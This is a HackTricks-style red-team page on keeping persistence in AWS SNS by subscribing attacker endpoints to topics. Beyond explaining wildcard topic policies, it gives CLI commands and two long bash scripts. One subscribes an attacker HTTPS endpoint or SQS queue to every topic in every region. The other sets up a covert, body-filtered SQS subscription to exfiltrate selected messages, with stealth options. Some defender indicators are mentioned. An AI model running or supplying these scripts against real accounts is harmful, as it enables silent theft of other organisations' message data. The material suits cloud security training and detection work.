AWS - SNS Persistence
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SNS
For more information check:
Persistence
When creating an SNS topic you have to state, through a resource-based (IAM-style) policy, who is allowed to read from and write to it. The principals can be external accounts, role ARNs, or even "*".
The policy below is what the console produces for a topic named MySNS.fifo. Its first statement grants the full set of management actions to "*" but narrows it with a Condition so that only requests whose AWS:SourceOwner is the owning account 318142138553 pass. The two console-generated statements (__console_pub_0 and __console_sub_0) have no such condition: they grant SNS:Publish and SNS:Subscribe to any principal, so anyone on AWS can write to the topic and attach a subscriber to it. When reviewing a topic policy, it is the unconditioned wildcard statements, not the presence of "*" on its own, that make the topic public:
{
  "Version": "2008-10-17",
  "Id": "__default_policy_ID",
  "Statement": [
    {
      "Sid": "__default_statement_ID",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": [
        "SNS:Publish",
        "SNS:RemovePermission",
        "SNS:SetTopicAttributes",
        "SNS:DeleteTopic",
        "SNS:ListSubscriptionsByTopic",
        "SNS:GetTopicAttributes",
        "SNS:AddPermission",
        "SNS:Subscribe"
      ],
      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
      "Condition": {
        "StringEquals": {
          "AWS:SourceOwner": "318142138553"
        }
      }
    },
    {
      "Sid": "__console_pub_0",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "SNS:Publish",
      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
    },
    {
      "Sid": "__console_sub_0",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "SNS:Subscribe",
      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
    }
  ]
}
Create Subscribers
To keep exfiltrating every message from every topic, an attacker can create subscribers for all the topics.
Note that if the topic is of type FIFO, only subscribers using the SQS protocol can be used. Also keep in mind that an HTTP/HTTPS subscription stays in PendingConfirmation until the endpoint fetches the SubscribeURL contained in the SubscriptionConfirmation message SNS posts to it, so the attacker's listener has to handle that first request before any notifications are delivered. Every Subscribe call is recorded in CloudTrail and the new endpoint shows up in ListSubscriptionsByTopic, which is where defenders should look for unexpected external endpoints.
aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
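The bulk-subscribe step above as a script. This is an added example, not code from the original page: it walks every enabled region, flags topic policies that name a wildcard Principal, picks the subscription protocol per topic (SQS for FIFO topics, HTTPS otherwise) and issues the subscribe call. The endpoint https://attacker.example/sns, the queue ARN arn:aws:sqs:us-east-1:111111111111:exfil.fifo, the use of ec2:DescribeRegions for region discovery and the SNS_PERSIST_RUN guard are all assumptions; the helper functions run offline.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: enumerate every SNS topic in
# every region, flag topics whose resource policy is open to any principal,
# and subscribe an attacker-controlled endpoint to each topic. Standard
# topics get an HTTPS subscription; FIFO topics (ARN ends in ".fifo") only
# accept SQS subscribers, so they get the attacker's FIFO queue ARN instead.
# The endpoint URL and queue ARN are hypothetical placeholders. Nothing talks
# to AWS unless SNS_PERSIST_RUN=1 is set, so the helpers can be used offline.
set -u

ATTACKER_HTTPS_ENDPOINT="https://attacker.example/sns"                    # hypothetical
ATTACKER_FIFO_QUEUE_ARN="arn:aws:sqs:us-east-1:111111111111:exfil.fifo"   # hypothetical

# Region of a topic ARN: arn:aws:sns:REGION:ACCOUNT:NAME
sns_region_of() {
  printf '%s\n' "$1" | cut -d: -f4
}

# Subscription protocol SNS accepts for the topic: FIFO topics take sqs only.
sns_protocol_for_topic() {
  case "$1" in
    *.fifo) printf 'sqs\n' ;;
    *)      printf 'https\n' ;;
  esac
}

# Endpoint that goes with that protocol.
sns_endpoint_for_topic() {
  case "$1" in
    *.fifo) printf '%s\n' "$ATTACKER_FIFO_QUEUE_ARN" ;;
    *)      printf '%s\n' "$ATTACKER_HTTPS_ENDPOINT" ;;
  esac
}

# Coarse triage of a topic policy: exit 0 if any statement names
# Principal "*" or {"AWS":"*"}. A wildcard statement may still be narrowed
# by a Condition (e.g. AWS:SourceOwner), so read flagged policies by hand.
sns_policy_has_wildcard_principal() {
  printf '%s' "$1" | tr -d ' \n\t' | grep -Eq '"Principal":([{]"AWS":)?"\*"'
}

# The exact CLI call for one topic, printed so it can be reviewed first.
sns_subscribe_cmd() {
  printf 'aws sns subscribe --region %s --topic-arn %s --protocol %s --notification-endpoint %s\n' \
    "$(sns_region_of "$1")" "$1" "$(sns_protocol_for_topic "$1")" "$(sns_endpoint_for_topic "$1")"
}

# Walk every enabled region and every topic. Needs ec2:DescribeRegions,
# sns:ListTopics, sns:GetTopicAttributes and sns:Subscribe.
sns_persist_everywhere() {
  local region arn policy
  for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
    for arn in $(aws sns list-topics --region "$region" --query 'Topics[].TopicArn' --output text); do
      policy=$(aws sns get-topic-attributes --region "$region" --topic-arn "$arn" \
                 --query 'Attributes.Policy' --output text)
      if sns_policy_has_wildcard_principal "$policy"; then
        echo "[!] $arn has a wildcard Principal in its policy"
      fi
      echo "[*] $(sns_subscribe_cmd "$arn")"
      aws sns subscribe --region "$region" --topic-arn "$arn" \
        --protocol "$(sns_protocol_for_topic "$arn")" \
        --notification-endpoint "$(sns_endpoint_for_topic "$arn")"
    done
  done
}

if [ "${SNS_PERSIST_RUN:-0}" = 1 ]; then
  sns_persist_everywhere
fi
```

Run it with SNS_PERSIST_RUN=1 and valid credentials. The HTTPS subscriptions it creates sit in PendingConfirmation until the listener GETs the SubscribeURL it receives, and the SQS subscriptions only deliver once the queue policy allows sns.amazonaws.com to SendMessage. The wildcard check is a grep, not a policy evaluator: it reports the page's sample policy as open because of the two unconditioned console statements, but it would also report a policy whose only wildcard statement is locked down by a Condition.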
Stealthy, selective exfiltration via FilterPolicy on MessageBody
An attacker with sns:Subscribe and sns:SetSubscriptionAttributes on a topic can create a low-profile SQS subscription they own that forwards only messages whose JSON body matches a very narrow filter (for example, {"secret":"true"}). This keeps the volume, and therefore the chance of being noticed, down while still allowing covert exfiltration of sensitive records. For a cross-account queue this requires the topic policy to grant sns:Subscribe to the attacker's principal, as the wildcard __console_sub_0 statement above does; the Subscribe and SetSubscriptionAttributes calls are still written to CloudTrail, and a FilterPolicyScope of MessageBody on a subscription pointing at a foreign SQS queue is a strong indicator for defenders.
Potential Impact: Covert, low-noise exfiltration of only the targeted SNS messages from the victim topic.
Steps (AWS CLI):
- Make sure the attacker's SQS queue policy allows sqs:SendMessage from the victim TopicArn (Condition aws:SourceArn equal to the TopicArn).
- Create the SQS subscription on the topic:
aws sns subscribe --region us-east-1 --topic-arn TOPIC_ARN --protocol sqs --notification-endpoint ATTACKER_Q_ARN
- Make the filter apply to the message body and match only secret=true:
aws sns set-subscription-attributes --region us-east-1 --subscription-arn SUB_ARN --attribute-name FilterPolicyScope --attribute-value MessageBody
aws sns set-subscription-attributes --region us-east-1 --subscription-arn SUB_ARN --attribute-name FilterPolicy --attribute-value '{"secret":["true"]}'
- Optional stealth: enable RawMessageDelivery so that only the raw payload reaches the receiver, without the SNS envelope:
aws sns set-subscription-attributes --region us-east-1 --subscription-arn SUB_ARN --attribute-name RawMessageDelivery --attribute-value true
- Verification: publish two messages and confirm that only the first one arrives in the attacker's queue. Example payloads:
{"secret":"true","data":"exfil"}
{"secret":"false","data":"benign"}
- Cleanup: unsubscribe and delete the attacker SQS queue if it was created for persistence testing.
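The whole procedure as one script. This is an added example, not part of the original page: helpers build the queue policy pinned to the victim topic, the escaped JSON-in-JSON document that sqs set-queue-attributes expects for Policy, the SNS filter policy, and an offline preview of which bodies the exact-match filter keeps; sns_exfil_setup then performs the CLI steps, publishes the two test payloads and reads the queue back. The topic ARN, the queue name exfil.fifo, the region, the SNS_EXFIL_RUN guard and the use of --return-subscription-arn are assumptions; the caller needs sqs:CreateQueue and sqs:SetQueueAttributes in its own account plus sns:Subscribe, sns:SetSubscriptionAttributes and sns:Publish on the victim topic.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: the body-filtered SQS
# subscription as one script. Helpers build the queue policy, the escaped
# JSON-in-JSON document SetQueueAttributes wants, the filter policy, and a
# local preview of which bodies the filter keeps. Only sns_exfil_setup talks
# to AWS, and only when SNS_EXFIL_RUN=1. Topic ARN, queue name and region
# are hypothetical placeholders.
set -u

TOPIC_ARN="${TOPIC_ARN:-arn:aws:sns:us-east-1:318142138553:MySNS.fifo}"  # victim topic (hypothetical)
QUEUE_NAME="${QUEUE_NAME:-exfil.fifo}"   # a FIFO topic needs a .fifo queue name here
REGION="${REGION:-us-east-1}"

# Queue policy: let SNS deliver into the queue, but only on behalf of this
# topic. Without the aws:SourceArn condition any topic in any account could
# push messages into the attacker's queue.
sqs_queue_policy() {  # $1 = queue ARN, $2 = topic ARN
  printf '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"%s","Condition":{"ArnEquals":{"aws:SourceArn":"%s"}}}]}' "$1" "$2"
}

# Escape a JSON document so it can sit inside a JSON string value
# (backslashes first, then double quotes).
json_escape() {
  printf '%s' "$1" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g'
}

# Attribute document for set-queue-attributes: Policy is a string attribute,
# so the policy JSON has to be escaped into it.
sqs_attributes_doc() {  # $1 = queue ARN, $2 = topic ARN
  printf '{"Policy":"%s"}' "$(json_escape "$(sqs_queue_policy "$1" "$2")")"
}

# SNS filter policy: every value is a list of accepted alternatives.
sns_filter_policy() {  # $1 = key, $2 = required value
  printf '{"%s":["%s"]}' "$1" "$2"
}

# Offline preview of the exact-string match on a top-level body key.
# SNS also supports prefix, anything-but, numeric and nested keys; not modelled.
filter_would_match() {  # $1 = key, $2 = value, $3 = JSON message body
  printf '%s' "$3" | tr -d ' \n\t' | grep -Fq "\"$1\":\"$2\""
}

# FIFO topics require a message group id and a deduplication id on publish.
sns_publish_test() {  # $1 = body, $2 = unique suffix for the dedup id
  case "$TOPIC_ARN" in
    *.fifo) aws sns publish --region "$REGION" --topic-arn "$TOPIC_ARN" --message "$1" \
              --message-group-id exfil --message-deduplication-id "test-$2" ;;
    *)      aws sns publish --region "$REGION" --topic-arn "$TOPIC_ARN" --message "$1" ;;
  esac
}

sns_exfil_setup() {
  local attrs queue_url queue_arn sub_arn
  attrs='{}'
  case "$QUEUE_NAME" in *.fifo) attrs='{"FifoQueue":"true"}' ;; esac
  queue_url=$(aws sqs create-queue --region "$REGION" --queue-name "$QUEUE_NAME" \
                --attributes "$attrs" --query QueueUrl --output text)
  queue_arn=$(aws sqs get-queue-attributes --region "$REGION" --queue-url "$queue_url" \
                --attribute-names QueueArn --query Attributes.QueueArn --output text)

  sqs_attributes_doc "$queue_arn" "$TOPIC_ARN" > /tmp/sqs-attrs.json
  aws sqs set-queue-attributes --region "$REGION" --queue-url "$queue_url" \
    --attributes file:///tmp/sqs-attrs.json

  # Subscribing from the queue owner's own account needs no confirmation step.
  sub_arn=$(aws sns subscribe --region "$REGION" --topic-arn "$TOPIC_ARN" --protocol sqs \
              --notification-endpoint "$queue_arn" --return-subscription-arn \
              --query SubscriptionArn --output text)
  aws sns set-subscription-attributes --region "$REGION" --subscription-arn "$sub_arn" \
    --attribute-name FilterPolicyScope --attribute-value MessageBody
  aws sns set-subscription-attributes --region "$REGION" --subscription-arn "$sub_arn" \
    --attribute-name FilterPolicy --attribute-value "$(sns_filter_policy secret true)"
  aws sns set-subscription-attributes --region "$REGION" --subscription-arn "$sub_arn" \
    --attribute-name RawMessageDelivery --attribute-value true

  # Verification: only the "secret":"true" body should show up in the queue.
  sns_publish_test '{"secret":"true","data":"exfil"}'  "$(date +%s)-1"
  sns_publish_test '{"secret":"false","data":"benign"}' "$(date +%s)-2"
  aws sqs receive-message --region "$REGION" --queue-url "$queue_url" \
    --wait-time-seconds 10 --max-number-of-messages 10 --query 'Messages[].Body' --output text

  echo "cleanup: aws sns unsubscribe --region $REGION --subscription-arn $sub_arn"
  echo "cleanup: aws sqs delete-queue --region $REGION --queue-url $queue_url"
}

if [ "${SNS_EXFIL_RUN:-0}" = 1 ]; then
  sns_exfil_setup
fi
```

Two details worth keeping in mind: the queue policy must be in place before the subscription is useful, because SNS silently drops deliveries the queue rejects, and the filter preview only reproduces the exact-match case used on this page, so a filter that relies on prefix or numeric operators has to be checked against the real topic.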